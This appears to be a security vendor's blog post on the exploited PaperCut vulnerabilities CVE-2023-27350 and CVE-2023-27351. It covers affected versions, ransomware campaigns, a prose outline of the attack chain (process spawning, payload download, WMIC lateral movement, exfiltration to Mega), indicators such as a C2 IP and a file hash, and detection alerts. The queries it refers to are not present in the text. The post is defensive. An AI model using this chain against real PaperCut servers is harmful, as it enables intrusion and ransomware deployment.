by Anish Bogati & Rabindra Dev Bhatta, Security Research – Updated May 8th 2023
PaperCut is a popular print management software used by thousands of organizations worldwide that help to make the task of printing easier and more secure. Recent reports have revealed a critical vulnerability, CVE-2023-27350 with a CVSS score of 9.8, in the software that is being actively exploited by threat actors such as Lace Tempest, and LockBit affiliates to deploy ransomware. The vulnerability allows attackers to remotely execute arbitrary code (RCE) on vulnerable systems, potentially giving them access to sensitive data and compromising the security of entire networks. Also, a high-severity vulnerability, CVE-2023–27351 with a CVSS score of 8.2 was reported in the PaperCut products. Both of these vulnerabilities were exploited by chaining authentication bypass vulnerability.
Here, we’ll explore the details of the PaperCut vulnerability, its impact on organizations, and the steps you can take to protect your systems from this attack.
According to PaperCut, Trend Micro reported about two vulnerabilities in the PaperCut MF & NG products, among which, CVE-2023-27350 is being actively exploited in the wild. On April 18th, 2023, a customer of PaperCut reported strange behavior in their system which possibly pointed toward the use of CVE-2023-27350 to attack unpatched systems. Based on PaperCut's analysis, the earliest instance connected to CVE-2023-27350 began on April 14th, 2023.
Important: According to PaperCut’s recent release, both of the vulnerabilities have been fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9 and later.
Affected Versions
The following PaperCut MF / NG versions and components are affected by the vulnerabilities:
| CVE-2023–27350 | CVE-2023–27351 |
|---|---|
|
Unpatched PaperCut MF or NG version 8.0 or later on all OS platforms. This includes:
Application & Site servers are impacted. |
Unpatched PaperCut MF or NG version 15.0 or later, on all OS platforms. This includes:
Application servers are impacted. |
About the Vulnerabilities, How Bad Are these
The exploitation relies on an authentication bypass that exposes the PaperCut Application Server's administrative user to additional risk. Once authentication has been bypassed, threat actors can execute arbitrary code on the server through the “NT AUTHORITY\SYSTEM” account. Proof of concept has been made publicly available by Horizon3.ai.
-
CVE-2023-27350 (Remote Code Execution vulnerability)
Also dubbed as ZDI-CAN-18987, the vulnerability allows an adversary to obtain Remote Code Execution (RCE) on a PaperCut Application Server, without the need to even log into the system. Pieces of evidence, pointing to its active exploitation have been found.
| CVE | CVSSv3 Score | Severity |
|---|---|---|
| CVE-2023-27350 | 9.8 | Critical |
-
CVE-2023-27351 (User account data vulnerability)
Dubbed ZDI-CAN-19226, the vulnerability enables an adversary to potentially access user data saved in PaperCut MF or NG, including usernames, actual names, email addresses, office/department information, and any card numbers linked to the user. Additionally, the hacker has access to hashed passwords for internally created PaperCut users; but is kept away from password hashes for users synced from directory sources like Microsoft 365, Google Workspace, Active Directory, and others are not included. This too is accomplished without the need to log into the system. No evidence is currently available, showing its exploitation on any customer’s end.
| CVE | CVSSv3 Score | Severity |
|---|---|---|
| CVE-2023-27351 | 8.2 | High |
In the wild
By today, there have been multiple instances where CVE-2023-27350 has been actively exploited by threat actors as a tool to plant malware into the target system.
-
Trend Micro revealed that LockBit ransomware - the most active ransomware, is being deployed as the end payload in the target systems.
-
Microsoft has detected adversaries delivering Clop ransomware
-
Huntress on the other hand has detected adversaries delivering crypto-miners into the target system.
Detection of PaperCut Exploitation & Post-Exploitation with Logpoint
Patching an organizational infrastructure takes time, and therefore, it is important to look for indicators of attack and detect any traces of exploitation attempts or intrusion.
Using Logpoint Converged SIEM with a few queries can be the tool in your arsenal for the grand act.
Required Log Sources
-
Windows
-
Windows Sysmon
-
Firewall
-
IDS/IPS
Vulnerabilities in PaperCut MF / NG were detected in January, and adversaries have been found exploiting them since April. Therefore, the baseline search timestamp from January is crucial when utilizing the following queries and alerts.
Threat actors exploited the vulnerabilities and spawned either PowerShell or Command Prompt process from the PaperCut process (pc-app.exe) to perform their malicious actions.
Additionally, adversaries can leverage the aforementioned vulnerability to spawn Java processes and execute malicious code. VulnCheck has also provided a new POC where ftp.exe was spawned to execute arbitrary commands.
Also, adversaries can devise other methods to evade detection so it is necessary to monitor for processes spawned by PaperCut.
Huntress has observed adversaries spawn Command Prompt through PaperCut and execute PowerShell commands to download the payload.
The execution of the above command can be detected using, “Usage of Web Request Command”
*Note: For the above alert to be triggered, the Script Block Logging module should be explicitly enabled.
If it is not enabled then, the below query can be used as an alternate option. But it is to be noted that the query will not be able to detect encoded commands.
The hash of the downloaded file is, f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb
The presence of the file related to the hash can be detected using the below query:
In another exploitation attempt, Huntress observed the usage of the following command to drop the payload in the system.
The alert “Usage of Web Request Command” can be utilized to detect such events. We can also detect the execution of such encoded payloads using the “Suspicious Encoded PowerShell Command Line” alert.
Security vendors have observed communication to various domains mentioned in the below query to download the payload:
After exploiting the vulnerability, the payload has been downloaded from IP address 5.188.206.14.
If Suricata has been set up to use emerging threat rules, the below query, can be utilized to detect communication to the C2 server.
After the payload was dropped into the system, adversaries utilized msiexec to execute the installation package.
Below query can be utilized to detect the installation of the payload,
As observed by Microsoft, Lace Tempest utilized WMIC to move laterally. A sample command is provided below:
Commands for lateral movement using WMIC can be detected using our alert “Suspicious WMI Execution Detected”
Also, adversaries have exfiltrated data to a mega cloud server so, the “Network Connection to Suspicious Server” alert can be utilized to detect network communication to Mega.io and other similar online services.
Incident response with Logpoint SOAR and AgentX
Logpoint Converged SIEM just got even better with the integration of AgentX! This native endpoint agent not only allows for the detection, investigation, and response to security incidents in the endpoints but also enables faster threat detection through Logpoint SOAR. As AgentX comes with built-in telemetry enrichment of SIEM+SOAR events and adds further context through MITRE TTPs, it provides SOC teams with actionable threat and operational information, reducing the time to respond to an incident.
Logpoint AgentX is available now: Contact your representative
The “Malicious File Investigation and Containment” playbook can be used to query files in threat intelligence platforms to check the legitimacy of the file and provide an automatic response.
Malicious File Investigation and Containment Playbook
By exploiting CVE-2023-27351 adversaries can retrieve credentials from the PaperCut Server. In case, users have used the same credentials, the “Disable AD User” playbook can be used to disable that particular user.
Disable AD User Playbook
After detecting the IOC on a host, an analyst or administrator can utilize the “Logpoint AgentX Isolate-Unisolate Host” playbook to isolate the host from the network.
Isolate Host Playbook
Final Words: Apply patch without delay
According to PaperCut’s recent release, both of the vulnerabilities have been fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9 and later. Therefore, upgrading your PaperCut Application Servers to one of the fixed versions is the optimal way to go.
Despite the patches, you can always be on the safe side and conduct a quick scan of your systems for traces of infection, with the detection queries provided in the blog.
